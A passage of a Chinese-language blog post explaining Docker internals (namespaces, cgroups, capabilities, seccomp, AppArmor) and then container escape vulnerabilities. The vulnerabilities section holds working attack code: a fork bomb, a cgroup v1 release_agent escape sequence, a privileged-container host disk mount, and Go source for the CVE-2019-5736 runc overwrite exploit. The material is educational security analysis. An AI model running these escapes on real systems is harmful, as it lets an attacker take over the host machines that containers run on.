64 bytes from 1.1.1.1: icmp_seq=1 ttl=127 time=132 ms

--- 1.1.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 132.086/132.086/132.086/0.000 ms

Docker Networking

➜  ~ ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
link/ether 00:0c:29:ae:69:6b brd ff:ff:ff:ff:ff:ff
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default
link/ether 02:42:4b:d6:d3:79 brd ff:ff:ff:ff:ff:ff
19: vethadac88e@if18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP mode DEFAULT group default
link/ether 26:e8:b8:a7:eb:36 brd ff:ff:ff:ff:ff:ff link-netnsid 1

➜ ~ docker container inspect 093352b2f64b -f "{{.NetworkSettings.SandboxKey}}"
/var/run/docker/netns/c8e883c49b07

➜ ~ l /run/docker/netns/
-r--r--r-- 1 root root 0 Apr 25 21:08 c8e883c49b07

➜ ~ docker exec -it 09 ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
18: eth0@if19: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 172.17.0.3/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever

# docker 的 netns 不在 iproute2 的默认位置,所以无法直接使用 ip netns 进行操作
# 也可以通过 ip netns PID xxx / nsenter -t PID
➜ ~ nsenter --net=/run/docker/netns/c8e883c49b07 ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
18: eth0@if19: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 172.17.0.3/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever

为了处理更多的情况,Docker 实际配了更复杂的 iptables 规则。

➜  ~ sudo iptables-save
# Generated by iptables-save v1.6.1 on Tue Apr 26 00:15:48 2022
*nat
:PREROUTING ACCEPT [43:5544]
:INPUT ACCEPT [12:868]
:OUTPUT ACCEPT [197:14047]
:POSTROUTING ACCEPT [192:13682]
:DOCKER - [0:0]
-A PREROUTING -m addrtype --dst-type LOCAL -j DOCKER
-A OUTPUT ! -d 127.0.0.0/8 -m addrtype --dst-type LOCAL -j DOCKER
-A POSTROUTING -s 172.17.0.0/16 ! -o docker0 -j MASQUERADE
-A DOCKER -i docker0 -j RETURN
COMMIT
# Completed on Tue Apr 26 00:15:48 2022
# Generated by iptables-save v1.6.1 on Tue Apr 26 00:15:48 2022
*filter
:INPUT ACCEPT [216589:98142351]
:FORWARD DROP [4:336]
:OUTPUT ACCEPT [66781:9510774]
:DOCKER - [0:0]
:DOCKER-ISOLATION-STAGE-1 - [0:0]
:DOCKER-ISOLATION-STAGE-2 - [0:0]
:DOCKER-USER - [0:0]
-A FORWARD -j DOCKER-USER
-A FORWARD -j DOCKER-ISOLATION-STAGE-1
-A FORWARD -o docker0 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -o docker0 -j DOCKER
-A FORWARD -i docker0 ! -o docker0 -j ACCEPT
-A FORWARD -i docker0 -o docker0 -j ACCEPT
-A DOCKER-ISOLATION-STAGE-1 -i docker0 ! -o docker0 -j DOCKER-ISOLATION-STAGE-2
-A DOCKER-ISOLATION-STAGE-1 -j RETURN
-A DOCKER-ISOLATION-STAGE-2 -o docker0 -j DROP
-A DOCKER-ISOLATION-STAGE-2 -j RETURN
-A DOCKER-USER -j RETURN
COMMIT
# Completed on Tue Apr 26 00:15:48 2022
docker network inspect bridge
[
{
"Name": "bridge",
"Id": "3fd9e256f3c3b32ff210b9e748295cd25e6d8b2959f0171a8ba8b26288e1eb11",
"Created": "2022-04-26T09:27:52.427958616-07:00",
"Scope": "local",
"Driver": "bridge",
"EnableIPv6": false,
"IPAM": {
"Driver": "default",
"Options": null,
"Config": [
{
"Subnet": "172.17.0.0/16",
"Gateway": "172.17.0.1"
}
]
},
"Internal": false,
"Attachable": false,
"Ingress": false,
"ConfigFrom": {
"Network": ""
},
"ConfigOnly": false,
"Containers": {
"bb8514e4d9b72a2a44161d235cbac4b59487a48252b379f2f5cea508f8675f7d": {
"Name": "dreamy_elbakyan",
"EndpointID": "2c8e20b5d5f30ef79fda1e95096d056daffbc7e20f1d10c067c4b58d13ebf341",
"MacAddress": "02:42:ac:11:00:02",
"IPv4Address": "172.17.0.2/16",
"IPv6Address": ""
}
},
"Options": {
"com.docker.network.bridge.default_bridge": "true",
"com.docker.network.bridge.enable_icc": "true",
"com.docker.network.bridge.enable_ip_masquerade": "true",
"com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
"com.docker.network.bridge.name": "docker0",
"com.docker.network.driver.mtu": "1500"
},
"Labels": {}
}
]

Cgroups

cgroups(7) - Linux manual page

2006/2007 => Cgroups v1

2012 => Cgroups v2

虽然已经有这么多种 Namespace,但仍有很多资源没法 Namespace 化,例如 CPU、内存、磁盘。

如果有人一上来就扔 fork 炸弹怎么办?

=> Limits how much you (groups) can use.

root@ubuntu:/# mount | grep cgroup
cgroup2 on /sys/fs/cgroup type cgroup2 (rw,nosuid,nodev,noexec,relatime)
root@ubuntu:/sys/fs/cgroup/# mkdir testcgp
root@ubuntu:/sys/fs/cgroup/# cd testcgp/
root@ubuntu:/sys/fs/cgroup/testcgp# cat cgroup.controllers
cpuset cpu io memory hugetlb pids rdma misc

root@ubuntu:/sys/fs/cgroup/testcgp# echo 5 > pids.max
root@ubuntu:/sys/fs/cgroup/testcgp# echo $$ > cgroup.procs
root@ubuntu:/sys/fs/cgroup/testcgp# cat cgroup.procs
71188
71480
root@ubuntu:/sys/fs/cgroup/testcgp# :(){ :|:& };:
-bash: fork: retry: Resource temporarily unavailable
-bash: fork: retry: Resource temporarily unavailable
-bash: fork: retry: Resource temporarily unavailable
-bash: fork: retry: Resource temporarily unavailable
-bash: fork: retry: Resource temporarily unavailable
-bash: fork: retry: Resource temporarily unavailable

https://docs.docker.com/config/containers/resource_constraints/

docker run -it --cpus=".1" ubuntu:20.04 bash

image-20230212233612345

Capabilities

Docker 内的 root 与外面的 root 有区别吗?

➜  ~ docker exec -it 9f bash
root@9fa04dc61480:/# id
uid=0(root) gid=0(root) groups=0(root)
root@9fa04dc61480:/# hostname test
hostname: you must be root to change the host name

此外,使用 User Namespace 可以把一个非特权用户映射为 root。

capabilities(7) - Linux manual page

Starting with kernel 2.2

all-or-nothing UNIX privilege scheme => individual capabilities

给了,又没完全给。

Docker 默认的 Caps https://github.com/moby/moby/blob/master/oci/caps/defaults.go

// DefaultCapabilities returns a Linux kernel default capabilities
func DefaultCapabilities() []string {
return []string{
"CAP_CHOWN",
"CAP_DAC_OVERRIDE",
"CAP_FSETID",
"CAP_FOWNER",
"CAP_MKNOD",
"CAP_NET_RAW",
"CAP_SETGID",
"CAP_SETUID",
"CAP_SETFCAP",
"CAP_SETPCAP",
"CAP_NET_BIND_SERVICE",
"CAP_SYS_CHROOT",
"CAP_KILL",
"CAP_AUDIT_WRITE",
}
}
root@9fa04dc61480:/# cat /proc/1/status
...
CapInh: 0000000000000000
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
...

➜ ~ capsh --decode=00000000a80425fb
0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap

capsh --print
pscap

利用场景

  1. 拥有 SYS_ADMIN

利用方式1:通过 Cgroup 进行逃逸,需要 –security-opt apparmor=unconfined

利用方式2:CVE-2022-0185

  1. 拥有 SYS_PTRACE

进程注入逃逸,需要 –pid=host 以及 –security-opt apparmor=unconfined

  1. 拥有 SYS_MODULE

加载恶意内核模块直接逃逸。

  1. 拥有 CAP_DAC_READ_SEARCH

Shocker attack: https://github.com/gabrtv/shocker

https://github.com/cdk-team/CDK/blob/main/pkg/exploit/cap_dac_read_search.go

早期 Docker 创建的容器默认拥有CAP_DAC_READ_SEARCH,可以绕过文件的读权限检查和目录的读和执行权限检查,使用 open_by_handle_at 系统调用来爆破宿主机的文件内容。

Other Security Features

➜ ~ docker info -f  '{{.SecurityOptions}}'
[name=apparmor name=seccomp,profile=default]

Seccomp

seccomp(2) - Linux manual page

Seccomp security profiles for Docker

Seccomp 即 secure computing mode,对进程能够调用的 syscall 进行限制。

{
"name": "accept",
"action": "SCMP_ACT_ALLOW",
"args": []
}

The default Docker profile:

https://github.com/moby/moby/blob/master/profiles/seccomp/default.json

AppArmor

AppArmor security profiles for Docker

https://gitlab.com/apparmor/apparmor/-/wikis/GettingStarted

Mandatory Access Control (MAC)

AppArmor confines individual programs to a set of files, capabilities, network access and rlimits

docker-default: https://github.com/moby/moby/blob/master/contrib/apparmor/template.go

root@8c7eea4f5e90:/# cat proc/1/attr/apparmor/current
docker-default (enforce)

Summary

容器的本质实际上是一个进程,一个视图被隔离、资源受限的进程。

并没有使用什么新技术,就是新瓶装旧酒,所以把图中的 Docker Engine 换成 Kernel 更严谨。

Generated

如果说 Linux Container 是进程,那 Kubernetes 作为这些进程的管理者是什么角色?

Networking

打开一下网络结构图放到一边

Interesting Vulnerabilities

Privileged Container Escape

docker run -it --privileged ubuntu:20.04

privileged 代表什么?runtime-privilege-and-linux-capabilities

  • 拥有所有特权

    $ grep CapEff /proc/self/status
    CapEff: 0000003fffffffff
  • 可以访问 Host 上的所有的设备

  • Seccomp 关闭

  • AppArmor 关闭

Mount disk

root@69cdae2e90c3:/# fdisk -l
Device Start End Sectors Size Type
/dev/sda3 1054720 83884031 82829312 39.5G Linux filesystem

root@69cdae2e90c3:/# mount /dev/sda3 /mnt
root@69cdae2e90c3:/# ls /mnt
2333 boot dev home lib32 libx32 media opt root sbin srv sys usr
bin cdrom etc lib lib64 lost+found mnt proc run snap swapfile tmp var

Cgroups (v1) release_agent

https://twitter.com/_fel1x/status/1151487051986087936

“借刀杀人”

# find /sys/fs/cgroup -name release_agent -writable

mkdir -p /sys/fs/cgroup/rdma/test
echo 1 > /sys/fs/cgroup/rdma/test/notify_on_release


echo -e '#!/bin/sh\ntouch /pwwwwwwn' > /exp && chmod +x /exp


host_dir=`sed -n 's/.*\upperdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_dir/exp" > /sys/fs/cgroup/rdma/release_agent
# /var/lib/docker/overlay2/6693d1546847dbab22ca702bc32bb4435b4404484307148445091a1b0dd4d331/diff/exp

# sh 一运行结束,test cgroup 就变为空,触发 notify 机制,使得内核运行 release_agent
sh -c 'echo $$ > /sys/fs/cgroup/rdma/test/cgroup.procs'

这种 release_agent 一定要在特权容器内才能利用吗?

CVE-2022-0492: Privilege escalation vulnerability causing container escape – Sysdig

A patch released fixes this issue in the version kernel 5.17 rc3.

docker run -it \
--security-opt seccomp=unconfined \
--security-opt apparmor=unconfined \
ubuntu:20.04 bash

AWS’s Log4Shell Hot Patch Vulnerable to Privilege Escalation

AWS 这个洞比较有意思,并不是 docker 本身的组件有问题,而是他们提供的一个给 log4j 打 patch 的工具写的有问题。

这里还提到不公开利用方式,一下子就来兴趣了。

当时看这篇文章的时候,洞是上个月公开的,本来之前就要分享的,被耽搁了一下。

我们先来看下这个工具的使用场景。

AWS 给 Log4Shell 应急时,给这种 hot patch 提供了三种接入方式,有单独的服务器、k8s 集群以及 ECS。

我们这里重点看一下 k8s 的,他的工作原理也很简单,创建一个 DaemonSet 进行部署,DaemonSet 的特性是创建一次就会运行在所有的节点上,这样就可以部署到所有节点上了,然后定时遍历进程树,对每个 Java 进程进行 patch。

如果这个进程是容器内的,则使用 nsenter 进入容器对应的 NS 中,问题就出在这里。

https://unit42.paloaltonetworks.com/aws-log4shell-hot-patch-vulnerabilities/

Following Log4Shell, AWS released several hot patch solutions that monitor for vulnerable Java applications and Java containers and patch them on the fly. Each solution suits a different environment, covering standalone servers, Kubernetes clusters, Elastic Container Service (ECS) clusters and Fargate.

We’ve decided not to share the exploit’s implementation details at this time to prevent malicious parties from weaponizing it.

April 19: AWS releases final fixes and advisories; Unit 42 discloses the vulnerabilities publicly.

TL;DR:利用 root 权限调用 nsenter 进入容器命名空间,但运行容器内的程序时未降权。

Kubernetes DaemonSet Solution

GitHub - aws-samples/kubernetes-log4j-cve-2021-44228-node-agent

DaemonSet 本身没有业务逻辑,只是通过 shell 脚本给每一个节点(宿主机)安装下面这个 deb 包。

继续跟进,解开安装包,得到:

pkg-deb -x ./log4j-cve-2021-44228-hotpatch_1.1.12_all.deb log4j

├── lib
│ └── systemd
│ └── system
│ └── log4j-cve-2021-44228-hotpatch.service
└── usr
├── bin
│ └── log4j-cve-2021-44228-hotpatch
└── share
└── log4j-cve-2021-44228-hotpatch
├── jdk11
│ └── Log4jHotPatch.jar
├── jdk17
│ └── Log4jHotPatchFat.jar
└── jdk8
└── Log4jHotPatch.jar

使用 systemd 创建了一个服务,定时遍历所有 Java 进程,然后运行下面的命令进行 hot patch:

java -cp Log4jHotPatch.jar Log4jHotPatch <java-pid>

而 log4j-cve-2021-44228-hotpatch 又是个 bash 脚本,精简一下逻辑。

NSENTER="sudo nsenter -t ${pid} -m -n -i -u -p -Z"

cat /usr/share/log4j-cve-2021-44228-hotpatch/jdk11/Log4jHotPatch.jar | ${NSENTER} sh -c "cat >/dev/shm/Log4jHotPatch.jar"

${NSENTER} -S "$MYEUID" -G "$MYEGID" "$JVM" $JVMOPTS -cp /dev/shm/Log4jHotPatch.jar Log4jHotPatch $container_pid

但 nsenter 并没有降权,直接使用特权执行了容器内的程序,例如:

sudo nsenter -t 42868 -m -n -u -p -Z -S 0 -G 0 grep CapEff /proc/self/status
CapEff: 000001ffffffffff
Seccomp: 0
Seccomp_filters: 0

如果攻击者把 java 命令换成一个恶意程序,就回到了上一节的特权容器逃逸:)

Fix

降权 + cgroup + seccomp …

最新修复版: kubernetes-log4j-cve-2021-44228-node-agent

那为啥不用现成的各类 container runtime 提供的 exec 功能,反而自己实现一遍这个过程?

runc: container breakout

image-20230212232743436

从这两个洞可以看出,虽然docker以安全、轻便著称,但是早期的容器还是比较粗糙的,问题不少。

image-20230212232732818

image-20230212232726235

CVE-2019-5736

恶意容器可以覆盖掉 Host 上的 runc 程序,从而实现逃逸(再次运行 runc 时)。

https://github.com/twistlock/RunC-CVE-2019-5736

/proc/self/exe

proc(5) - Linux manual page

➜  ~ ls -alh /proc/self/exe
lrwxrwxrwx 1 iubu iubu 0 May 17 14:56 /proc/self/exe -> /usr/bin/ls

甚至可以跨 Namespace 进行 dereference,直接打破了隔离限制。

magic symbolic link 拥有无限可能!

=> echo “#!/proc/self/exe” > /bin/sh

=> docker exec container_id sh

=> runc exec container_id sh

=> execve /proc/self/exe

=> runc

(overwrite /proc/self/exe)

=> docker xxx (run runc)

=> pwn

func main() {
// This is the line of shell commands that will execute on the host
var payload = "#!/bin/bash \ntouch /pwwwwwwwn"

ioutil.WriteFile("/bin/sh", []byte("#!/proc/self/exe"), 0755)

fmt.Println("[+] Overwritten /bin/sh successfully")

foundPid := -1
for foundPid == -1 {
pids, err := ioutil.ReadDir("/proc")
if err != nil {
panic(err)
}
for _, f := range pids {
fbytes, _ := ioutil.ReadFile("/proc/" + f.Name() + "/cmdline")
if strings.Contains(string(fbytes), "runc") {
foundPid, _ = strconv.Atoi(f.Name())
fmt.Println("[+] Found the PID:", f.Name())
break
}
}
}

handleFd := -1
for {
fmt.Println("[+] Waiting for runc to open the file")
readHandle, _ := os.OpenFile("/proc/"+strconv.Itoa(foundPid)+"/exe", os.O_RDONLY, 0700)
if int(readHandle.Fd()) > 0 {
fmt.Println("[+] Successfully got the file handle")
handleFd = int(readHandle.Fd())
break
}
}

if writeHandle, _ := os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd), os.O_WRONLY|os.O_TRUNC, 0700); int(writeHandle.Fd()) > 0 {
fmt.Println("[+] Successfully got write handle", writeHandle)
if _, err := writeHandle.Write([]byte(payload)); err != nil {
panic(err)
}
fmt.Println("[+] The command executed is" + payload)
writeHandle.Close()
}
}

image-20230212232648639

CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host

Breaking out of Docker via runC – Explaining CVE-2019-5736

为什么不直接覆盖最初的 /proc/[pid]/exe,反而通过 #!/proc/self/exe 再运行一遍?

CVE-2016-9962

https://nvd.nist.gov/vuln/detail/CVE-2016-9962

https://bugzilla.suse.com/show_bug.cgi?id=1012568

Other Containers

下一个容器,何必是容器。

有些容器真的是虚拟机。

image-20230212232638134

Open Container Initiative (OCI)

https://github.com/opencontainers/runtime-spec

https://github.com/opencontainers/image-spec

image-20230212232630579

gVisor / Kata Containers

云函数

https://github.com/google/gvisor

gVisor 是一个用 Go 编写的应用层内核,实现了大部分 Linux 系统调用接口,在应用程序和操作系统之间提供了额外的隔离层。

image-20230212235836368

docker run -it --runtime=runsc ubuntu:20.04 bash

https://katacontainers.io

QEMU

image-20230212235845345

image-20230212235851196

Windows Containers

https://docs.microsoft.com/en-us/virtualization/windowscontainers/about/

image-20230212235750695

# Indicates that the windowsservercore image will be used as the base image.
FROM mcr.microsoft.com/windows/servercore:ltsc2019

# Uses dism.exe to install the IIS role.
RUN dism.exe /online /enable-feature /all /featurename:iis-webserver /NoRestart

# Creates an HTML file and adds content to this file.
RUN echo "Hello World - Dockerfile" > c:\inetpub\wwwroot\index.html

# Sets a command or process that will run each time a container is run from the new image.
CMD [ "cmd" ]

image-20230212235803185

Process Isolation

Generated

Hyper-V isolation

Generated

Summary

Container (Docker) ? Process : Virtual Machine

题外话:我的博客即将同步至腾讯云开发者社区,邀请大家一同入驻:https://cloud.tencent.com/developer/support-plan?invite_code=1xzw7j9xx23ap

References

Namespaces in operation

🏗️ Docker Labs

Docker implemented in around 100 lines of bash

红蓝对抗中的云原生漏洞挖掘及利用实录

All articles on Containers

• MARS:Kubernetes基础及实践 分享

OS: Operating Systems

• Container Security - Privilege Escalation Techniques

CATALOG
  1. 1. What’s the major problems need to solve?
  2. 2. The Alternative solutions
    1. 2.1. Vagrant
      1. 2.1.1. Select a Box
      2. 2.1.2. Vagrantfile
    2. 2.2. Puppet / Chef / Ansible
    3. 2.3. LXC
    4. 2.4. Other
  3. 3. Docker’s Key Techniques
    1. 3.1. Docker Architecture
    2. 3.2. Namespaces
      1. 3.2.1. First experience of Namespaces
      2. 3.2.2. Namespaces system call
      3. 3.2.3. nsenter tool
    3. 3.3. File System
      1. 3.3.1. rootfs
      2. 3.3.2. chroot
      3. 3.3.3. All config in json
    4. 3.4. Networking
      1. 3.4.1. Network Namespace in Action
      2. 3.4.2. Docker Networking
    5. 3.5. Cgroups
    6. 3.6. Capabilities
    7. 3.7. Other Security Features
      1. 3.7.1. Seccomp
      2. 3.7.2. AppArmor
    8. 3.8. Summary
    9. 3.9. Networking
  4. 4. Interesting Vulnerabilities
    1. 4.1. Privileged Container Escape
      1. 4.1.1. Mount disk
      2. 4.1.2. Cgroups (v1) release_agent
    2. 4.2. AWS’s Log4Shell Hot Patch Vulnerable to Privilege Escalation
    3. 4.3. runc: container breakout
      1. 4.3.1. CVE-2019-5736
      2. 4.3.2. CVE-2016-9962
  5. 5. Other Containers
    1. 5.1. Open Container Initiative (OCI)
    2. 5.2. gVisor / Kata Containers
    3. 5.3. Windows Containers
  6. 6. Summary
  7. 7. References